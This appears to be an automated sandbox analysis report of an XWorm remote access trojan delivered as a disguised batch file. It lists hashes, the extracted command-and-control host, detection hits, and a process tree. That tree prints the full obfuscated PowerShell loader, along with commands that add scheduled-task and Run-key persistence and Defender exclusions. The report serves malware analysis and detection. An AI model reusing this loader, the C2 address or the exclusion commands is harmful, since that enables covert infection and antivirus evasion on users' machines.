xworm | 0c55bb4d572eb35093da11086643bcf6c04a1b7653de40e5e289df61b96f0c16

Analysis

max time kernel
149s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
02/09/2024, 15:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Recording 2024-09-01.bat
Size

10.5MB
MD5

ea1315beaae801fd48de7f359a6f9411
SHA1

a565aee47aa42bd87dafea38d6090447df6d822c
SHA256

0c55bb4d572eb35093da11086643bcf6c04a1b7653de40e5e289df61b96f0c16
SHA512

1616cad5cff6a75306db6479f98df4bf78084c0596983a9e46cedffed447ab0028a839604d3dd931603e535e455b52688a942e98582ba1751d1d13611ffbe00f
SSDEEP

49152:RCRYnt0My3KYMfNIBZ9pCm4+DwXGPOXFTqKZp239XT48jmRjrd7dU52F65QV9Qp2:9

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

manufacturer-rank.gl.at.ply.gg:60383

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x000500000002aa15-56.dat	family_xworm
behavioral1/memory/2884-63-0x0000000000D80000-0x0000000000DF4000-memory.dmp	family_xworm
behavioral1/files/0x000300000002aa64-81.dat	family_xworm
behavioral1/memory/4600-88-0x0000000000F70000-0x0000000000F88000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1084	powershell.exe
680	powershell.exe
5116	powershell.exe
4940	powershell.exe
4460	powershell.exe
4332	powershell.exe
3764	powershell.exe
3856	powershell.exe
972	powershell.exe
4960	powershell.exe
3828	powershell.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	Anti RAT V12.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	Anti RAT V12.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	Xworm.exe

Executes dropped EXE 64 IoCs

pid	Process
2884	Anti RAT V12.exe
440	Xworm V5.6.exe
4600	Xworm.exe
724	Xworm V5.6.exe
488	Xworm.exe
4048	Xworm V5.6.exe
3320	Xworm.exe
844	Xworm V5.6.exe
3672	Xworm.exe
3208	Xworm V5.6.exe
4164	Xworm.exe
2052	Xworm V5.6.exe
1816	Xworm.exe
2344	Xworm V5.6.exe
2076	Xworm.exe
3876	Xworm V5.6.exe
3244	Xworm.exe
3348	Xworm V5.6.exe
4324	Xworm.exe
2772	Xworm V5.6.exe
2984	Xworm.exe
404	Xworm V5.6.exe
2292	Xworm.exe
1040	Xworm V5.6.exe
484	Xworm.exe
4564	Xworm V5.6.exe
240	Xworm.exe
3988	Xworm V5.6.exe
1112	Xworm.exe
1932	Xworm V5.6.exe
3152	Xworm.exe
2916	Xworm V5.6.exe
3296	Xworm.exe
844	Xworm V5.6.exe
2148	Xworm.exe
3828	Xworm V5.6.exe
2412	Xworm.exe
3568	Xworm V5.6.exe
3064	Xworm.exe
4332	Xworm V5.6.exe
1908	Xworm.exe
1972	Xworm V5.6.exe
3876	Xworm.exe
1580	Xworm V5.6.exe
1416	Xworm.exe
968	Xworm V5.6.exe
3580	Xworm.exe
4560	Xworm V5.6.exe
1320	Xworm.exe
936	Xworm V5.6.exe
2896	Xworm.exe
4784	Xworm V5.6.exe
2100	Xworm.exe
4424	Xworm V5.6.exe
4564	Xworm.exe
3464	Xworm V5.6.exe
2084	Xworm.exe
3720	Xworm V5.6.exe
1768	Xworm.exe
3436	Xworm V5.6.exe
1444	System User
4104	Xworm.exe
1224	Xworm V5.6.exe
1328	Xworm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Software\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User"	Anti RAT V12.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Software\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User"	Xworm.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1596	schtasks.exe
4936	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
680	powershell.exe
680	powershell.exe
5116	powershell.exe
5116	powershell.exe
1084	powershell.exe
1084	powershell.exe
4940	powershell.exe
4940	powershell.exe
4460	powershell.exe
4460	powershell.exe
4332	powershell.exe
4332	powershell.exe
3764	powershell.exe
3764	powershell.exe
3856	powershell.exe
3856	powershell.exe
972	powershell.exe
972	powershell.exe
2884	Anti RAT V12.exe
4960	powershell.exe
4960	powershell.exe
3828	powershell.exe
3828	powershell.exe
4600	Xworm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	680	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeIncreaseQuotaPrivilege	5116	powershell.exe
Token: SeSecurityPrivilege	5116	powershell.exe
Token: SeTakeOwnershipPrivilege	5116	powershell.exe
Token: SeLoadDriverPrivilege	5116	powershell.exe
Token: SeSystemProfilePrivilege	5116	powershell.exe
Token: SeSystemtimePrivilege	5116	powershell.exe
Token: SeProfSingleProcessPrivilege	5116	powershell.exe
Token: SeIncBasePriorityPrivilege	5116	powershell.exe
Token: SeCreatePagefilePrivilege	5116	powershell.exe
Token: SeBackupPrivilege	5116	powershell.exe
Token: SeRestorePrivilege	5116	powershell.exe
Token: SeShutdownPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeSystemEnvironmentPrivilege	5116	powershell.exe
Token: SeRemoteShutdownPrivilege	5116	powershell.exe
Token: SeUndockPrivilege	5116	powershell.exe
Token: SeManageVolumePrivilege	5116	powershell.exe
Token: 33	5116	powershell.exe
Token: 34	5116	powershell.exe
Token: 35	5116	powershell.exe
Token: 36	5116	powershell.exe
Token: SeIncreaseQuotaPrivilege	5116	powershell.exe
Token: SeSecurityPrivilege	5116	powershell.exe
Token: SeTakeOwnershipPrivilege	5116	powershell.exe
Token: SeLoadDriverPrivilege	5116	powershell.exe
Token: SeSystemProfilePrivilege	5116	powershell.exe
Token: SeSystemtimePrivilege	5116	powershell.exe
Token: SeProfSingleProcessPrivilege	5116	powershell.exe
Token: SeIncBasePriorityPrivilege	5116	powershell.exe
Token: SeCreatePagefilePrivilege	5116	powershell.exe
Token: SeBackupPrivilege	5116	powershell.exe
Token: SeRestorePrivilege	5116	powershell.exe
Token: SeShutdownPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeSystemEnvironmentPrivilege	5116	powershell.exe
Token: SeRemoteShutdownPrivilege	5116	powershell.exe
Token: SeUndockPrivilege	5116	powershell.exe
Token: SeManageVolumePrivilege	5116	powershell.exe
Token: 33	5116	powershell.exe
Token: 34	5116	powershell.exe
Token: 35	5116	powershell.exe
Token: 36	5116	powershell.exe
Token: SeIncreaseQuotaPrivilege	5116	powershell.exe
Token: SeSecurityPrivilege	5116	powershell.exe
Token: SeTakeOwnershipPrivilege	5116	powershell.exe
Token: SeLoadDriverPrivilege	5116	powershell.exe
Token: SeSystemProfilePrivilege	5116	powershell.exe
Token: SeSystemtimePrivilege	5116	powershell.exe
Token: SeProfSingleProcessPrivilege	5116	powershell.exe
Token: SeIncBasePriorityPrivilege	5116	powershell.exe
Token: SeCreatePagefilePrivilege	5116	powershell.exe
Token: SeBackupPrivilege	5116	powershell.exe
Token: SeRestorePrivilege	5116	powershell.exe
Token: SeShutdownPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeSystemEnvironmentPrivilege	5116	powershell.exe
Token: SeRemoteShutdownPrivilege	5116	powershell.exe
Token: SeUndockPrivilege	5116	powershell.exe
Token: SeManageVolumePrivilege	5116	powershell.exe
Token: 33	5116	powershell.exe
Token: 34	5116	powershell.exe
Token: 35	5116	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2884	Anti RAT V12.exe
4600	Xworm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1376 wrote to memory of 680	1376	cmd.exe	82
PID 1376 wrote to memory of 680	1376	cmd.exe	82
PID 680 wrote to memory of 5116	680	powershell.exe	85
PID 680 wrote to memory of 5116	680	powershell.exe	85
PID 680 wrote to memory of 3400	680	powershell.exe	87
PID 680 wrote to memory of 3400	680	powershell.exe	87
PID 3400 wrote to memory of 4968	3400	WScript.exe	88
PID 3400 wrote to memory of 4968	3400	WScript.exe	88
PID 4968 wrote to memory of 1084	4968	cmd.exe	90
PID 4968 wrote to memory of 1084	4968	cmd.exe	90
PID 1084 wrote to memory of 2884	1084	powershell.exe	91
PID 1084 wrote to memory of 2884	1084	powershell.exe	91
PID 1084 wrote to memory of 440	1084	powershell.exe	92
PID 1084 wrote to memory of 440	1084	powershell.exe	92
PID 440 wrote to memory of 4600	440	Xworm V5.6.exe	93
PID 440 wrote to memory of 4600	440	Xworm V5.6.exe	93
PID 440 wrote to memory of 724	440	Xworm V5.6.exe	94
PID 440 wrote to memory of 724	440	Xworm V5.6.exe	94
PID 2884 wrote to memory of 4940	2884	Anti RAT V12.exe	95
PID 2884 wrote to memory of 4940	2884	Anti RAT V12.exe	95
PID 2884 wrote to memory of 4460	2884	Anti RAT V12.exe	97
PID 2884 wrote to memory of 4460	2884	Anti RAT V12.exe	97
PID 2884 wrote to memory of 4332	2884	Anti RAT V12.exe	99
PID 2884 wrote to memory of 4332	2884	Anti RAT V12.exe	99
PID 724 wrote to memory of 488	724	Xworm V5.6.exe	101
PID 724 wrote to memory of 488	724	Xworm V5.6.exe	101
PID 2884 wrote to memory of 3764	2884	Anti RAT V12.exe	102
PID 2884 wrote to memory of 3764	2884	Anti RAT V12.exe	102
PID 724 wrote to memory of 4048	724	Xworm V5.6.exe	104
PID 724 wrote to memory of 4048	724	Xworm V5.6.exe	104
PID 4600 wrote to memory of 3856	4600	Xworm.exe	105
PID 4600 wrote to memory of 3856	4600	Xworm.exe	105
PID 4600 wrote to memory of 972	4600	Xworm.exe	107
PID 4600 wrote to memory of 972	4600	Xworm.exe	107
PID 2884 wrote to memory of 1596	2884	Anti RAT V12.exe	109
PID 2884 wrote to memory of 1596	2884	Anti RAT V12.exe	109
PID 4600 wrote to memory of 4960	4600	Xworm.exe	111
PID 4600 wrote to memory of 4960	4600	Xworm.exe	111
PID 4048 wrote to memory of 3320	4048	Xworm V5.6.exe	113
PID 4048 wrote to memory of 3320	4048	Xworm V5.6.exe	113
PID 4600 wrote to memory of 3828	4600	Xworm.exe	114
PID 4600 wrote to memory of 3828	4600	Xworm.exe	114
PID 4048 wrote to memory of 844	4048	Xworm V5.6.exe	116
PID 4048 wrote to memory of 844	4048	Xworm V5.6.exe	116
PID 4600 wrote to memory of 4936	4600	Xworm.exe	117
PID 4600 wrote to memory of 4936	4600	Xworm.exe	117
PID 844 wrote to memory of 3672	844	Xworm V5.6.exe	119
PID 844 wrote to memory of 3672	844	Xworm V5.6.exe	119
PID 844 wrote to memory of 3208	844	Xworm V5.6.exe	120
PID 844 wrote to memory of 3208	844	Xworm V5.6.exe	120
PID 3208 wrote to memory of 4164	3208	Xworm V5.6.exe	121
PID 3208 wrote to memory of 4164	3208	Xworm V5.6.exe	121
PID 3208 wrote to memory of 2052	3208	Xworm V5.6.exe	122
PID 3208 wrote to memory of 2052	3208	Xworm V5.6.exe	122
PID 2052 wrote to memory of 1816	2052	Xworm V5.6.exe	123
PID 2052 wrote to memory of 1816	2052	Xworm V5.6.exe	123
PID 2052 wrote to memory of 2344	2052	Xworm V5.6.exe	124
PID 2052 wrote to memory of 2344	2052	Xworm V5.6.exe	124
PID 2344 wrote to memory of 2076	2344	Xworm V5.6.exe	125
PID 2344 wrote to memory of 2076	2344	Xworm V5.6.exe	125
PID 2344 wrote to memory of 3876	2344	Xworm V5.6.exe	126
PID 2344 wrote to memory of 3876	2344	Xworm V5.6.exe	126
PID 3876 wrote to memory of 3244	3876	Xworm V5.6.exe	127
PID 3876 wrote to memory of 3244	3876	Xworm V5.6.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Recording 2024-09-01.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0dtIkrFE6oNEPpxGwNC90NeqI8xHQE5kI3kv5xoh2sg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fp0pgBxNQH3MU7vN1DWl2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jeCvp=New-Object System.IO.MemoryStream(,$param_var); $uxoVp=New-Object System.IO.MemoryStream; $BPDJh=New-Object System.IO.Compression.GZipStream($jeCvp, [IO.Compression.CompressionMode]::Decompress); $BPDJh.CopyTo($uxoVp); $BPDJh.Dispose(); $jeCvp.Dispose(); $uxoVp.Dispose(); $uxoVp.ToArray();}function execute_function($param_var,$param2_var){ $jNWGO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QnOct=$jNWGO.EntryPoint; $QnOct.Invoke($null, $param2_var);}$zkWSq = 'C:\Users\Admin\AppData\Local\Temp\Recording 2024-09-01.bat';$host.UI.RawUI.WindowTitle = $zkWSq;$wWXvv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zkWSq).Split([Environment]::NewLine);foreach ($QqnyZ in $wWXvv) { if ($QqnyZ.StartsWith(':: ')) { $OxnGt=$QqnyZ.Substring(3); break; }}$payloads_var=[string[]]$OxnGt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_934_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_934.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5116
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_934.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_934.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0dtIkrFE6oNEPpxGwNC90NeqI8xHQE5kI3kv5xoh2sg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fp0pgBxNQH3MU7vN1DWl2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jeCvp=New-Object System.IO.MemoryStream(,$param_var); $uxoVp=New-Object System.IO.MemoryStream; $BPDJh=New-Object System.IO.Compression.GZipStream($jeCvp, [IO.Compression.CompressionMode]::Decompress); $BPDJh.CopyTo($uxoVp); $BPDJh.Dispose(); $jeCvp.Dispose(); $uxoVp.Dispose(); $uxoVp.ToArray();}function execute_function($param_var,$param2_var){ $jNWGO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QnOct=$jNWGO.EntryPoint; $QnOct.Invoke($null, $param2_var);}$zkWSq = 'C:\Users\Admin\AppData\Roaming\startup_str_934.bat';$host.UI.RawUI.WindowTitle = $zkWSq;$wWXvv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zkWSq).Split([Environment]::NewLine);foreach ($QqnyZ in $wWXvv) { if ($QqnyZ.StartsWith(':: ')) { $OxnGt=$QqnyZ.Substring(3); break; }}$payloads_var=[string[]]$OxnGt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1084
      - C:\Users\Admin\AppData\Local\Temp\Anti RAT V12.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Anti RAT V12.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Anti RAT V12.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Anti RAT V12.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3764
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1596
      - C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xworm.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Xworm.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3828
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:724
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        8⤵
        Executes dropped EXE
        
        PID:488
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        9⤵
        Executes dropped EXE
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        10⤵
        Executes dropped EXE
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        11⤵
        Executes dropped EXE
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        12⤵
        Executes dropped EXE
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        13⤵
        Executes dropped EXE
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        14⤵
        Executes dropped EXE
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        14⤵
        Executes dropped EXE
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        15⤵
        Executes dropped EXE
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        15⤵
        Executes dropped EXE
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        16⤵
        Executes dropped EXE
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        16⤵
        Executes dropped EXE
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        17⤵
        Executes dropped EXE
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        17⤵
        Executes dropped EXE
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        18⤵
        Executes dropped EXE
        
        PID:484
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        18⤵
        Executes dropped EXE
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        19⤵
        Executes dropped EXE
        
        PID:240
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        19⤵
        Executes dropped EXE
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        20⤵
        Executes dropped EXE
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        20⤵
        Executes dropped EXE
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        21⤵
        Executes dropped EXE
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        21⤵
        Executes dropped EXE
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        22⤵
        Executes dropped EXE
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        22⤵
        Executes dropped EXE
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
